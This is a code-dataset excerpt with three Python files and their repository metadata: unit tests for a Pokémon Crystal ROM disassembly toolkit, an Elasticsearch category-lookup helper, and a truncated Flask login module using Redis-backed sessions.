0) for address in [0x4000, 0x5000, 0x6000, 0x7000]: self.assertRaises(Exception, calculate_bank, address) def test_calculate_pointer(self): # for offset <= 0x4000 self.assertEqual(calculate_pointer(0x0000), 0x0000) self.assertEqual(calculate_pointer(0x3FFF), 0x3FFF) # for 0x4000 <= offset <= 0x7FFFF self.assertEqual(calculate_pointer(0x430F, bank=5), 0x1430F) # for offset >= 0x7FFF self.assertEqual(calculate_pointer(0x8FFF, bank=6), calculate_pointer(0x8FFF, bank=7)) def test_calculate_pointer_from_bytes_at(self): addr1 = calculate_pointer_from_bytes_at(0x100, bank=False) self.assertEqual(addr1, 0xc300) addr2 = calculate_pointer_from_bytes_at(0x100, bank=True) self.assertEqual(addr2, 0x2ec3) def test_rom_text_at(self): self.assertEquals(rom_text_at(0x112116, 8), "HTTP/1.0") def test_translate_command_byte(self): self.failUnless(translate_command_byte(crystal=0x0) == 0x0) self.failUnless(translate_command_byte(crystal=0x10) == 0x10) self.failUnless(translate_command_byte(crystal=0x40) == 0x40) 
self.failUnless(translate_command_byte(gold=0x0) == 0x0) self.failUnless(translate_command_byte(gold=0x10) == 0x10) self.failUnless(translate_command_byte(gold=0x40) == 0x40) self.assertEqual(translate_command_byte(gold=0x0), translate_command_byte(crystal=0x0)) self.failUnless(translate_command_byte(gold=0x52) == 0x53) self.failUnless(translate_command_byte(gold=0x53) == 0x54) self.failUnless(translate_command_byte(crystal=0x53) == 0x52) self.failUnless(translate_command_byte(crystal=0x52) == None) self.assertRaises(Exception, translate_command_byte, None, gold=0xA4) def test_pksv_integrity(self): "does pksv_gs look okay?" self.assertEqual(pksv_gs[0x00], "2call") self.assertEqual(pksv_gs[0x2D], "givepoke") self.assertEqual(pksv_gs[0x85], "waitbutton") self.assertEqual(pksv_crystal[0x00], "2call") self.assertEqual(pksv_crystal[0x86], "waitbutton") self.assertEqual(pksv_crystal[0xA2], "credits") def test_chars_integrity(self): self.assertEqual(chars[0x80], "A") self.assertEqual(chars[0xA0], "a") self.assertEqual(chars[0xF0], "¥") self.assertEqual(jap_chars[0x44], "ぱ") def test_map_names_integrity(self): def map_name(map_group, map_id): return map_names[map_group][map_id]["name"] self.assertEqual(map_name(2, 7), "Mahogany Town") self.assertEqual(map_name(3, 0x34), "Ilex Forest") self.assertEqual(map_name(7, 0x11), "Cerulean City") def test_load_map_group_offsets(self): addresses = load_map_group_offsets() self.assertEqual(len(addresses), 26, msg="there should be 26 map groups") addresses = load_map_group_offsets() self.assertEqual(len(addresses), 26, msg="there should still be 26 map groups") self.assertIn(0x94034, addresses) for address in addresses: self.assertGreaterEqual(address, 0x4000) self.failIf(0x4000 <= address <= 0x7FFF) self.failIf(address <= 0x4000) def test_index(self): self.assertTrue(index([1,2,3,4], lambda f: True) == 0) self.assertTrue(index([1,2,3,4], lambda f: f==3) == 2) def test_get_pokemon_constant_by_id(self): x = get_pokemon_constant_by_id self.assertEqual(x(1), "BULBASAUR") self.assertEqual(x(151), "MEW") self.assertEqual(x(250), "HO_OH") def test_find_item_label_by_id(self): x = find_item_label_by_id self.assertEqual(x(249), "HM_07") self.assertEqual(x(173), "BERRY") self.assertEqual(x(45), None) def test_generate_item_constants(self): x = generate_item_constants r = x() self.failUnless("HM_07" in r) self.failUnless("EQU" in r) def test_get_label_for(self): global all_labels temp = copy(all_labels) # this is basd on the format defined in get_labels_between all_labels = [{"label": "poop", "address": 0x5, "offset": 0x5, "bank": 0, "line_number": 2 }] self.assertEqual(get_label_for(5), "poop") all_labels = temp def test_generate_map_constant_labels(self): ids = generate_map_constant_labels() self.assertEqual(ids[0]["label"], "OLIVINE_POKECENTER_1F") self.assertEqual(ids[1]["label"], "OLIVINE_GYM") def test_get_id_for_map_constant_label(self): global map_internal_ids map_internal_ids = generate_map_constant_labels() self.assertEqual(get_id_for_map_constant_label("OLIVINE_GYM"), 1) self.assertEqual(get_id_for_map_constant_label("OLIVINE_POKECENTER_1F"), 0) def test_get_map_constant_label_by_id(self): global map_internal_ids map_internal_ids = generate_map_constant_labels() self.assertEqual(get_map_constant_label_by_id(0), "OLIVINE_POKECENTER_1F") self.assertEqual(get_map_constant_label_by_id(1), "OLIVINE_GYM") def test_is_valid_address(self): self.assertTrue(is_valid_address(0)) self.assertTrue(is_valid_address(1)) self.assertTrue(is_valid_address(10)) 
self.assertTrue(is_valid_address(100)) self.assertTrue(is_valid_address(1000)) self.assertTrue(is_valid_address(10000)) self.assertFalse(is_valid_address(2097153)) self.assertFalse(is_valid_address(2098000)) addresses = [random.randrange(0,2097153) for i in range(0, 9+1)] for address in addresses: self.assertTrue(is_valid_address(address)) class TestIntervalMap(unittest.TestCase): def test_intervals(self): i = IntervalMap() first = "hello world" second = "testing 123" i[0:5] = first i[5:10] = second self.assertEqual(i[0], first) self.assertEqual(i[1], first) self.assertNotEqual(i[5], first) self.assertEqual(i[6], second) i[3:10] = second self.assertEqual(i[3], second) self.assertNotEqual(i[4], first) def test_items(self): i = IntervalMap() first = "hello world" second = "testing 123" i[0:5] = first i[5:10] = second results = list(i.items()) self.failUnless(len(results) == 2) self.assertEqual(results[0], ((0, 5), "hello world")) self.assertEqual(results[1], ((5, 10), "testing 123")) class TestRomStr(unittest.TestCase): """RomStr is a class that should act exactly like str() except that it never shows the contents of it string unless explicitly forced""" sample_text = "hello world!" sample = None def setUp(self): if self.sample == None: self.__class__.sample = RomStr(self.sample_text) def test_equals(self): "check if RomStr() == str()" self.assertEquals(self.sample_text, self.sample) def test_not_equal(self): "check if RomStr('a') != RomStr('b')" self.assertNotEqual(RomStr('a'), RomStr('b')) def test_appending(self): "check if RomStr()+'a'==str()+'a'" self.assertEquals(self.sample_text+'a', self.sample+'a') def test_conversion(self): "check if RomStr() -> str() works" self.assertEquals(str(self.sample), self.sample_text) def test_inheritance(self): self.failUnless(issubclass(RomStr, str)) def test_length(self): self.assertEquals(len(self.sample_text), len(self.sample)) self.assertEquals(len(self.sample_text), self.sample.length()) self.assertEquals(len(self.sample), self.sample.length()) def test_rom_interval(self): global rom load_rom() address = 0x100 interval = 10 correct_strings = ['0x0', '0xc3', '0x6e', '0x1', '0xce', '0xed', '0x66', '0x66', '0xcc', '0xd'] byte_strings = rom.interval(address, interval, strings=True) self.assertEqual(byte_strings, correct_strings) correct_ints = [0, 195, 110, 1, 206, 237, 102, 102, 204, 13] ints = rom.interval(address, interval, strings=False) self.assertEqual(ints, correct_ints) def test_rom_until(self): global rom load_rom() address = 0x1337 byte = 0x13 bytes = rom.until(address, byte, strings=True) self.failUnless(len(bytes) == 3) self.failUnless(bytes[0] == '0xd5') bytes = rom.until(address, byte, strings=False) self.failUnless(len(bytes) == 3) self.failUnless(bytes[0] == 0xd5) class TestAsmList(unittest.TestCase): """AsmList is a class that should act exactly like list() except that it never shows the contents of its list unless explicitly forced""" def test_equals(self): base = [1,2,3] asm = AsmList(base) self.assertEquals(base, asm) self.assertEquals(asm, base) self.assertEquals(base, list(asm)) def test_inheritance(self): self.failUnless(issubclass(AsmList, list)) def test_length(self): base = range(0, 10) asm = AsmList(base) self.assertEquals(len(base), len(asm)) self.assertEquals(len(base), asm.length()) self.assertEquals(len(base), len(list(asm))) self.assertEquals(len(asm), asm.length()) def test_remove_quoted_text(self): x = remove_quoted_text self.assertEqual(x("hello world"), "hello world") self.assertEqual(x("hello \"world\""), "hello ") 
input = 'hello world "testing 123"' self.assertNotEqual(x(input), input) input = "hello world 'testing 123'" self.assertNotEqual(x(input), input) self.failIf("testing" in x(input)) def test_line_has_comment_address(self): x = line_has_comment_address self.assertFalse(x("")) self.assertFalse(x(";")) self.assertFalse(x(";;;")) self.assertFalse(x(":;")) self.assertFalse(x(":;:")) self.assertFalse(x(";:")) self.assertFalse(x(" ")) self.assertFalse(x("".join(" " * 5))) self.assertFalse(x("".join(" " * 10))) self.assertFalse(x("hello world")) self.assertFalse(x("hello_world")) self.assertFalse(x("hello_world:")) self.assertFalse(x("hello_world:;")) self.assertFalse(x("hello_world: ;")) self.assertFalse(x("hello_world: ; ")) self.assertFalse(x("hello_world: ;" + "".join(" " * 5))) self.assertFalse(x("hello_world: ;" + "".join(" " * 10))) self.assertTrue(x(";1")) self.assertTrue(x(";F")) self.assertTrue(x(";$00FF")) self.assertTrue(x(";0x00FF")) self.assertTrue(x("; 0x00FF")) self.assertTrue(x(";$3:$300")) self.assertTrue(x(";0x3:$300")) self.assertTrue(x(";$3:0x300")) self.assertTrue(x(";3:300")) self.assertTrue(x(";3:FFAA")) self.assertFalse(x('hello world "how are you today;0x1"')) self.assertTrue(x('hello world "how are you today:0x1";1')) returnable = {} self.assertTrue(x("hello_world: ; 0x4050", returnable=returnable, bank=5)) self.assertTrue(returnable["address"] == 0x14050) def test_line_has_label(self): x = line_has_label self.assertTrue(x("hi:")) self.assertTrue(x("Hello: ")) self.assertTrue(x("MyLabel: ; test xyz")) self.assertFalse(x(":")) self.assertFalse(x(";HelloWorld:")) self.assertFalse(x("::::")) self.assertFalse(x(":;:;:;:::")) def test_get_label_from_line(self): x = get_label_from_line self.assertEqual(x("HelloWorld: "), "HelloWorld") self.assertEqual(x("HiWorld:"), "HiWorld") self.assertEqual(x("HiWorld"), None) def test_find_labels_without_addresses(self): global asm asm = ["hello_world: ; 0x1", "hello_world2: ;"] labels = find_labels_without_addresses() self.failUnless(labels[0]["label"] == "hello_world2") asm = ["hello world: ;1", "hello_world: ;2"] labels = find_labels_without_addresses() self.failUnless(len(labels) == 0) asm = None def test_get_labels_between(self): global asm x = get_labels_between#(start_line_id, end_line_id, bank) asm = ["HelloWorld: ;1", "hi:", "no label on this line", ] labels = x(0, 2, 0x12) self.assertEqual(len(labels), 1) self.assertEqual(labels[0]["label"], "HelloWorld") del asm # this test takes a lot of time :( def xtest_scan_for_predefined_labels(self): # label keys: line_number, bank, label, offset, address load_asm() all_labels = scan_for_predefined_labels() label_names = [x["label"] for x in all_labels] self.assertIn("GetFarByte", label_names) self.assertIn("AddNTimes", label_names) self.assertIn("CheckShininess", label_names) def test_write_all_labels(self): """dumping json into a file""" filename = "test_labels.json" # remove the current file if os.path.exists(filename): os.system("rm " + filename) # make up some labels labels = [] # fake label 1 label = {"line_number": 5, "bank": 0, "label": "SomeLabel", "address": 0x10} labels.append(label) # fake label 2 label = {"line_number": 15, "bank": 2, "label": "SomeOtherLabel", "address": 0x9F0A} labels.append(label) # dump to file write_all_labels(labels, filename=filename) # open the file and read the contents file_handler = open(filename, "r") contents = file_handler.read() file_handler.close() # parse into json obj = json.read(contents) # begin testing self.assertEqual(len(obj), 
len(labels)) self.assertEqual(len(obj), 2) self.assertEqual(obj, labels) def test_isolate_incbins(self): global asm asm = ["123", "456", "789", "abc", "def", "ghi", 'INCBIN "baserom.gbc",$12DA,$12F8 - $12DA', "jkl", 'INCBIN "baserom.gbc",$137A,$13D0 - $137A'] lines = isolate_incbins() self.assertIn(asm[6], lines) self.assertIn(asm[8], lines) for line in lines: self.assertIn("baserom", line) def test_process_incbins(self): global incbin_lines, processed_incbins, asm incbin_lines = ['INCBIN "baserom.gbc",$12DA,$12F8 - $12DA', 'INCBIN "baserom.gbc",$137A,$13D0 - $137A'] asm = copy(incbin_lines) asm.insert(1, "some other random line") processed_incbins = process_incbins() self.assertEqual(len(processed_incbins), len(incbin_lines)) self.assertEqual(processed_incbins[0]["line"], incbin_lines[0]) self.assertEqual(processed_incbins[2]["line"], incbin_lines[1]) def test_reset_incbins(self): global asm, incbin_lines, processed_incbins # temporarily override the functions global load_asm, isolate_incbins, process_incbins temp1, temp2, temp3 = load_asm, isolate_incbins, process_incbins def load_asm(): pass def isolate_incbins(): pass def process_incbins(): pass # call reset reset_incbins() # check the results self.assertTrue(asm == [] or asm == None) self.assertTrue(incbin_lines == []) self.assertTrue(processed_incbins == {}) # reset the original functions load_asm, isolate_incbins, process_incbins = temp1, temp2, temp3 def test_find_incbin_to_replace_for(self): global asm, incbin_lines, processed_incbins asm = ['first line', 'second line', 'third line', 'INCBIN "baserom.gbc",$90,$200 - $90', 'fifth line', 'last line'] isolate_incbins() process_incbins() line_num = find_incbin_to_replace_for(0x100) # must be the 4th line (the INBIN line) self.assertEqual(line_num, 3) def test_split_incbin_line_into_three(self): global asm, incbin_lines, processed_incbins asm = ['first line', 'second line', 'third line', 'INCBIN "baserom.gbc",$90,$200 - $90', 'fifth line', 'last line'] isolate_incbins() process_incbins() content = split_incbin_line_into_three(3, 0x100, 10) # must end up with three INCBINs in output self.failUnless(content.count("INCBIN") == 3) def test_analyze_intervals(self): global asm, incbin_lines, processed_incbins asm, incbin_lines, processed_incbins = None, [], {} asm = ['first line', 'second line', 'third line', 'INCBIN "baserom.gbc",$90,$200 - $90', 'fifth line', 'last line', 'INCBIN "baserom.gbc",$33F,$4000 - $33F'] isolate_incbins() process_incbins() largest = analyze_intervals() self.assertEqual(largest[0]["line_number"], 6) self.assertEqual(largest[0]["line"], asm[6]) self.assertEqual(largest[1]["line_number"], 3) self.assertEqual(largest[1]["line"], asm[3]) def test_generate_diff_insert(self): global asm asm = ['first line', 'second line', 'third line', 'INCBIN "baserom.gbc",$90,$200 - $90', 'fifth line', 'last line', 'INCBIN "baserom.gbc",$33F,$4000 - $33F'] diff = generate_diff_insert(0, "the real first line", debug=False) self.assertIn("the real first line", diff) self.assertIn("INCBIN", diff) self.assertNotIn("No newline at end of file", diff) self.assertIn("+"+asm[1], diff) class TestMapParsing(unittest.TestCase): def test_parse_all_map_headers(self): global parse_map_header_at, old_parse_map_header_at, counter counter = 0 for k in map_names.keys(): if "offset" not in map_names[k].keys(): map_names[k]["offset"] = 0 temp = parse_map_header_at temp2 = old_parse_map_header_at def parse_map_header_at(address, map_group=None, map_id=None, debug=False): global counter counter += 1 return 
{} old_parse_map_header_at = parse_map_header_at parse_all_map_headers(debug=False) # parse_all_map_headers is currently doing it 2x # because of the new/old map header parsing routines self.assertEqual(counter, 388 * 2) parse_map_header_at = temp old_parse_map_header_at = temp2 class TestTextScript(unittest.TestCase): """for testing 'in-script' commands, etc.""" #def test_to_asm(self): # pass # or raise NotImplementedError, bryan_message #def test_find_addresses(self): # pass # or raise NotImplementedError, bryan_message #def test_parse_text_at(self): # pass # or raise NotImplementedError, bryan_message class TestEncodedText(unittest.TestCase): """for testing chars-table encoded text chunks""" def test_process_00_subcommands(self): g = process_00_subcommands(0x197186, 0x197186+601, debug=False) self.assertEqual(len(g), 42) self.assertEqual(len(g[0]), 13) self.assertEqual(g[1], [184, 174, 180, 211, 164, 127, 20, 231, 81]) def test_parse_text_at2(self): oakspeech = parse_text_at2(0x197186, 601, debug=False) self.assertIn("encyclopedia", oakspeech) self.assertIn("researcher", oakspeech) self.assertIn("dependable", oakspeech) def test_parse_text_engine_script_at(self): p = parse_text_engine_script_at(0x197185, debug=False) self.assertEqual(len(p.commands), 2) self.assertEqual(len(p.commands[0]["lines"]), 41) # don't really care about these other two def test_parse_text_from_bytes(self): pass def test_parse_text_at(self): pass class TestScript(unittest.TestCase): """for testing parse_script_engine_script_at and script parsing in general. Script should be a class.""" #def test_parse_script_engine_script_at(self): # pass # or raise NotImplementedError, bryan_message def test_find_all_text_pointers_in_script_engine_script(self): address = 0x197637 # 0x197634 script = parse_script_engine_script_at(address, debug=False) bank = calculate_bank(address) r = find_all_text_pointers_in_script_engine_script(script, bank=bank, debug=False) results = list(r) self.assertIn(0x197661, results) class TestLabel(unittest.TestCase): def test_label_making(self): line_number = 2 address = 0xf0c0 label_name = "poop" l = Label(name=label_name, address=address, line_number=line_number) self.failUnless(hasattr(l, "name")) self.failUnless(hasattr(l, "address")) self.failUnless(hasattr(l, "line_number")) self.failIf(isinstance(l.address, str)) self.failIf(isinstance(l.line_number, str)) self.failUnless(isinstance(l.name, str)) self.assertEqual(l.line_number, line_number) self.assertEqual(l.name, label_name) self.assertEqual(l.address, address) class TestByteParams(unittest.TestCase): @classmethod def setUpClass(cls): load_rom() cls.address = 10 cls.sbp = SingleByteParam(address=cls.address) @classmethod def tearDownClass(cls): del cls.sbp def test__init__(self): self.assertEqual(self.sbp.size, 1) self.assertEqual(self.sbp.address, self.address) def test_parse(self): self.sbp.parse() self.assertEqual(str(self.sbp.byte), str(45)) def test_to_asm(self): self.assertEqual(self.sbp.to_asm(), "$2d") self.sbp.should_be_decimal = True self.assertEqual(self.sbp.to_asm(), str(45)) # HexByte and DollarSignByte are the same now def test_HexByte_to_asm(self): h = HexByte(address=10) a = h.to_asm() self.assertEqual(a, "$2d") def test_DollarSignByte_to_asm(self): d = DollarSignByte(address=10) a = d.to_asm() self.assertEqual(a, "$2d") def test_ItemLabelByte_to_asm(self): i = ItemLabelByte(address=433) self.assertEqual(i.byte, 54) self.assertEqual(i.to_asm(), "COIN_CASE") self.assertEqual(ItemLabelByte(address=10).to_asm(), "$2d") def 
test_DecimalParam_to_asm(self):
        d = DecimalParam(address=10)
        x = d.to_asm()
        self.assertEqual(x, str(0x2d))

class TestMultiByteParam(unittest.TestCase):
    def setup_for(self, somecls, byte_size=2, address=443, **kwargs):
        self.cls = somecls(address=address, size=byte_size, **kwargs)
        self.assertEqual(self.cls.address, address)
        self.assertEqual(self.cls.bytes, rom_interval(address, byte_size, strings=False))
        self.assertEqual(self.cls.size, byte_size)

    def test_two_byte_param(self):
        self.setup_for(MultiByteParam, byte_size=2)
        self.assertEqual(self.cls.to_asm(), "$f0c0")

    def test_three_byte_param(self):
        self.setup_for(MultiByteParam, byte_size=3)

    def test_PointerLabelParam_no_bank(self):
        self.setup_for(PointerLabelParam, bank=None)
        # assuming no label at this location..
        self.assertEqual(self.cls.to_asm(), "$f0c0")
        global all_labels
        # hm.. maybe all_labels should be using a class?
        all_labels = [{"label": "poop", "address": 0xf0c0,
                       "offset": 0xf0c0, "bank": 0,
                       "line_number": 2
                     }]
        self.assertEqual(self.cls.to_asm(), "poop")

class TestPostParsing: #(unittest.TestCase):
    """tests that must be run after parsing all maps"""

    @classmethod
    def setUpClass(cls):
        run_main()

    def test_signpost_counts(self):
        self.assertEqual(len(map_names[1][1]["signposts"]), 0)
        self.assertEqual(len(map_names[1][2]["signposts"]), 2)
        self.assertEqual(len(map_names[10][5]["signposts"]), 7)

    def test_warp_counts(self):
        self.assertEqual(map_names[10][5]["warp_count"], 9)
        self.assertEqual(map_names[18][5]["warp_count"], 3)
        self.assertEqual(map_names[15][1]["warp_count"], 2)

    def test_map_sizes(self):
        self.assertEqual(map_names[15][1]["height"], 18)
        self.assertEqual(map_names[15][1]["width"], 10)
        self.assertEqual(map_names[7][1]["height"], 4)
        self.assertEqual(map_names[7][1]["width"], 4)

    def test_map_connection_counts(self):
        self.assertEqual(map_names[7][1]["connections"], 0)
        self.assertEqual(map_names[10][1]["connections"], 12)
        self.assertEqual(map_names[10][2]["connections"], 12)
        self.assertEqual(map_names[11][1]["connections"], 9) # or 13?

    def test_second_map_header_address(self):
        self.assertEqual(map_names[11][1]["second_map_header_address"], 0x9509c)
        self.assertEqual(map_names[1][5]["second_map_header_address"], 0x95bd0)

    def test_event_address(self):
        self.assertEqual(map_names[17][5]["event_address"], 0x194d67)
        self.assertEqual(map_names[23][3]["event_address"], 0x1a9ec9)

    def test_people_event_counts(self):
        self.assertEqual(len(map_names[23][3]["people_events"]), 4)
        self.assertEqual(len(map_names[10][3]["people_events"]), 9)

class TestMetaTesting(unittest.TestCase):
    """test whether or not i am finding at least some of the tests in this file"""
    tests = None

    def setUp(self):
        if self.tests == None:
            self.__class__.tests = assemble_test_cases()

    def test_assemble_test_cases_count(self):
        "does assemble_test_cases find some tests?"
        self.failUnless(len(self.tests) > 0)

    def test_assemble_test_cases_inclusion(self):
        "is this class found by assemble_test_cases?"
        # i guess it would have to be for this to be running?
        self.failUnless(self.__class__ in self.tests)

    def test_assemble_test_cases_others(self):
        "test other inclusions for assemble_test_cases"
        self.failUnless(TestRomStr in self.tests)
        self.failUnless(TestCram in self.tests)

    def test_check_has_test(self):
        self.failUnless(check_has_test("beaver", ["test_beaver"]))
        self.failUnless(check_has_test("beaver", ["test_beaver_2"]))
        self.failIf(check_has_test("beaver_1", ["test_beaver"]))

    def test_find_untested_methods(self):
        untested = find_untested_methods()
        # the return type must be an iterable
        self.failUnless(hasattr(untested, "__iter__"))
        #.. basically, a list
        self.failUnless(isinstance(untested, list))

    def test_find_untested_methods_method(self):
        """create a function and see if it is found"""
        # setup a function in the global namespace
        global some_random_test_method
        # define the method
        def some_random_test_method(): pass
        # first make sure it is in the global scope
        members = inspect.getmembers(sys.modules[__name__], inspect.isfunction)
        func_names = [functuple[0] for functuple in members]
        self.assertIn("some_random_test_method", func_names)
        # test whether or not it is found by find_untested_methods
        untested = find_untested_methods()
        self.assertIn("some_random_test_method", untested)
        # remove the test method from the global namespace
        del some_random_test_method

    def test_load_tests(self):
        loader = unittest.TestLoader()
        suite = load_tests(loader, None, None)
        suite._tests[0]._testMethodName
        membership_test = lambda member: \
            inspect.isclass(member) and issubclass(member, unittest.TestCase)
        tests = inspect.getmembers(sys.modules[__name__], membership_test)
        classes = [x[1] for x in tests]
        for test in suite._tests:
            self.assertIn(test.__class__, classes)

    def test_report_untested(self):
        untested = find_untested_methods()
        output = report_untested()
        if len(untested) > 0:
            self.assertIn("NOT TESTED", output)
            for name in untested:
                self.assertIn(name, output)
        elif len(untested) == 0:
            self.assertNotIn("NOT TESTED", output)

def assemble_test_cases():
    """finds classes that inherit from unittest.TestCase
    because i am too lazy to remember to add them to a global list of tests
    for the suite runner"""
    classes = []
    clsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)
    for (name, some_class) in clsmembers:
        if issubclass(some_class, unittest.TestCase):
            classes.append(some_class)
    return classes

def load_tests(loader, tests, pattern):
    suite = unittest.TestSuite()
    for test_class in assemble_test_cases():
        tests = loader.loadTestsFromTestCase(test_class)
        suite.addTests(tests)
    return suite

def check_has_test(func_name, tested_names):
    """checks if there is a test dedicated to this function"""
    if "test_"+func_name in tested_names:
        return True
    for name in tested_names:
        if "test_"+func_name in name:
            return True
    return False

def find_untested_methods():
    """finds all untested functions in this module
    by searching for method names in test case
    method names."""
    untested = []
    avoid_funcs = ["main", "run_tests", "run_main", "copy", "deepcopy"]
    test_funcs = []
    # get a list of all classes in this module
    classes = inspect.getmembers(sys.modules[__name__], inspect.isclass)
    # for each class..
    for (name, klass) in classes:
        # only look at those that have tests
        if issubclass(klass, unittest.TestCase):
            # look at this class' methods
            funcs = inspect.getmembers(klass, inspect.ismethod)
            # for each method..
            for (name2, func) in funcs:
                # store the ones that begin with test_
                if "test_" in name2 and name2[0:5] == "test_":
                    test_funcs.append([name2, func])
    # assemble a list of all test method names (test_x, test_y, ..)
    tested_names = [funcz[0] for funcz in test_funcs]
    # now get a list of all functions in this module
    funcs = inspect.getmembers(sys.modules[__name__], inspect.isfunction)
    # for each function..
    for (name, func) in funcs:
        # we don't care about some of these
        if name in avoid_funcs:
            continue
        # skip functions beginning with _
        if name[0] == "_":
            continue
        # check if this function has a test named after it
        has_test = check_has_test(name, tested_names)
        if not has_test:
            untested.append(name)
    return untested

def report_untested():
    """
    This reports about untested functions in the global namespace.

    This was originally in the crystal module, where it would list out
    the majority of the functions. Maybe it should be moved back.
    """
    untested = find_untested_methods()
    output = "NOT TESTED: ["
    first = True
    for name in untested:
        if first:
            output += name
            first = False
        else:
            output += ", "+name
    output += "]\n"
    output += "total untested: " + str(len(untested))
    return output

def run_tests(): # rather than unittest.main()
    loader = unittest.TestLoader()
    suite = load_tests(loader, None, None)
    unittest.TextTestRunner(verbosity=2).run(suite)
    print report_untested()

# run the unit tests when this file is executed directly
if __name__ == "__main__":
    run_tests()
UTF-8
Python
false
false
37,500
py
147
tests.py
8
0.613095
0.585065
0
1,014
35.976331
95
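The trailing numeric fields on each record (length_bytes, num_lines, avg_line_length, max_line_length, alphanum_fraction, alpha_fraction) appear to be statistics derived from the content field. The dump does not document the exact formulas, so the sketch below is only one plausible, assumed way to compute matching values; the helper name file_stats is invented for illustration.

# Hypothetical reconstruction of the per-file statistics columns shown above.
# The exact formulas used by the dataset are not documented here; this only
# illustrates one reasonable way such values could be derived.
def file_stats(content):
    lines = content.splitlines()
    total_chars = len(content)
    return {
        "length_bytes": len(content.encode("utf-8")),
        "num_lines": len(lines),
        "avg_line_length": (sum(len(l) for l in lines) / len(lines)) if lines else 0.0,
        "max_line_length": max((len(l) for l in lines), default=0),
        "alphanum_fraction": (sum(c.isalnum() for c in content) / total_chars) if total_chars else 0.0,
        "alpha_fraction": (sum(c.isalpha() for c in content) / total_chars) if total_chars else 0.0,
    }

if __name__ == "__main__":
    # quick smoke test on a tiny snippet of Python source
    print(file_stats("import os\nprint(os.getcwd())\n"))

Running this on a record's content string should produce numbers of the same shape as the columns above, though rounding and encoding details may differ from whatever pipeline built the dataset.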
naveenpras/listapi
16,363,825,397,813
5e6b9fcacf6e5eb10a881358691f786ecefa8c95
a8b3877bec390809d446e66ce130e1907b3998f5
/apiservice/utils.py
a6c22e1532d2ca3a045cae1da97ad7990276d53e
[]
no_license
https://github.com/naveenpras/listapi
d42dbcfb459bbabe7e23e2dfd1ea8c9b76c9f31e
d4c439468e7c3329baf6879040a9fb34824bc7f3
refs/heads/master
"2015-08-11T23:55:16.517000"
"2015-06-24T05:56:09"
"2015-06-24T05:56:09"
20,580,908
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from elasticutils import S
import logging

logger = logging.getLogger(__name__)


class Utils():
    def searchItemAndGetCategory(self, item):
        logger.debug("Finding Category for:" + item)
        #searchstring = item.lower()
        searchstring = item
        logger.debug("Getting category using match for:" + searchstring)
        categoryid = "0"
        q = S().query(item__match=searchstring)
        if q.count() > 0:
            result = list(q[:1])[0]
            categoryid = result.CategoryId
            logger.debug("\tfound:" + result.item + ",category:" + str(result.CategoryId))
            return int(categoryid)
        else:
            logger.debug("Getting category using fuzzy for:" + searchstring)
            q = S().query(item__fuzzy=searchstring)
            if q.count() > 0:
                result = list(q[:1])[0]
                categoryid = result.CategoryId
                logger.debug("\tfound:" + result.item + ",category:" + str(result.CategoryId))
                return int(categoryid)
            else:
                logger.debug("Getting category using wildcard for:" + searchstring)
                q = S().query(item__wildcard="*" + searchstring + "*")
                if q.count() > 0:
                    result = list(q[:1])[0]
                    categoryid = result.CategoryId
                    logger.debug("\tfound:" + result.item + ",category:" + str(result.CategoryId))
                    return int(categoryid)
                else:
                    logger.info("\tCategory not found for item:" + item)
                    return int(categoryid)
UTF-8
Python
false
false
1,608
py
28
utils.py
17
0.536692
0.530473
0
37
42.486486
97
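The searchItemAndGetCategory method in the utils.py record above walks through three progressively looser elasticutils queries (match, then fuzzy, then wildcard) and returns the CategoryId of the first hit. Below is a condensed sketch of that fallback pattern; it reuses only the query calls already present in the record and assumes an elasticutils/Elasticsearch index with item and CategoryId fields is configured.

# Condensed sketch of the match -> fuzzy -> wildcard fallback used above.
# Assumes elasticutils is configured against an index whose documents carry
# `item` and `CategoryId` fields, exactly as the record's code does.
from elasticutils import S

def category_for(item):
    queries = [
        S().query(item__match=item),
        S().query(item__fuzzy=item),
        S().query(item__wildcard="*" + item + "*"),
    ]
    for q in queries:
        if q.count() > 0:
            hit = list(q[:1])[0]      # take the best-scoring document
            return int(hit.CategoryId)
    return 0                          # same default as the original method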
ssurkovs/planerka
15,479,062,143,907
f48b644b8025c6ab106dcc3c6eea0c3158924d77
56429de82e9539f6165d3ead31b0762e7bd7dd12
/views/login.py
681c7c2f21714af0cf26a679b8fea36a16c6429f
[]
no_license
https://github.com/ssurkovs/planerka
9f2ce82ac3e772764b2bd6b600d83930db516a78
8d9abe46b62ba96687e0dddcd9b517504d210970
refs/heads/master
"2018-10-28T20:09:29.117000"
"2018-10-25T16:08:05"
"2018-10-25T16:08:05"
112,482,528
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*-
from hashlib import md5

from flask import request, session
from flask_login import LoginManager, login_user, logout_user, current_user

import pickle
from datetime import timedelta
from uuid import uuid4
from redis import Redis
from werkzeug.datastructures import CallbackDict
from flask.sessions import SessionInterface, SessionMixin

from . import app
from models.User import User
from utils.utils import gen_reply

login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'


class RedisSession(CallbackDict, SessionMixin):

    def __init__(self, initial=None, sid=None, new=False):
        def on_update(self):
            self.modified = True
        CallbackDict.__init__(self, initial, on_update)
        self.sid = sid
        self.new = new
        self.modified = False


class RedisSessionInterface(SessionInterface):
    serializer = pickle
    session_class = RedisSession

    def __init__(self, redis=None, prefix='session:'):
        if redis is None:
            redis = Redis()
        self.redis = redis
        self.prefix = prefix

    def generate_sid(self):
        return str(uuid4())

    def get_redis_expiration_time(self, app, session):
        if session.permanent:
            return app.permanent_session_lifetime
        return timedelta(days=1)

    def open_session(self, app, request):
        sid = request.cookies.get(app.session_cookie_name)
        if not sid:
            sid = self.generate_sid()
            return self.session_class(sid=sid, new=True)
        val = self.redis.get(self.prefix + sid)
        if val is not None:
            data = self.serializer.loads(val)
            return self.session_class(data, sid=sid)
        return self.session_class(sid=sid, new=True)

    def save_session(self, app, session, response):
        domain = self.get_cookie_domain(app)
        if not session:
            self.redis.delete(self.prefix + session.sid)
            if session.modified:
                response.delete_cookie(app.session_cookie_name, domain=domain)
            return
        redis_exp = self.get_redis_expiration_time(app, session)
        cookie_exp = self.get_expiration_time(app, session)
        val = self.serializer.dumps(dict(session))
        self.redis.setex(self.prefix + session.sid, val,
                         int(redis_exp.total_seconds()))
        response.set_cookie(app.session_cookie_name, session.sid,
                            expires=cookie_exp, httponly=True, domain=domain)


@login_manager.user_loader
def load_user(id_):
    return app.db.query(User).get(id_)


@app.route('/api/v1.0/login', methods=['POST'])
def login():
    try:
        params = request.json
        username = params['login']
        password = params['password']
    except Exception as e:
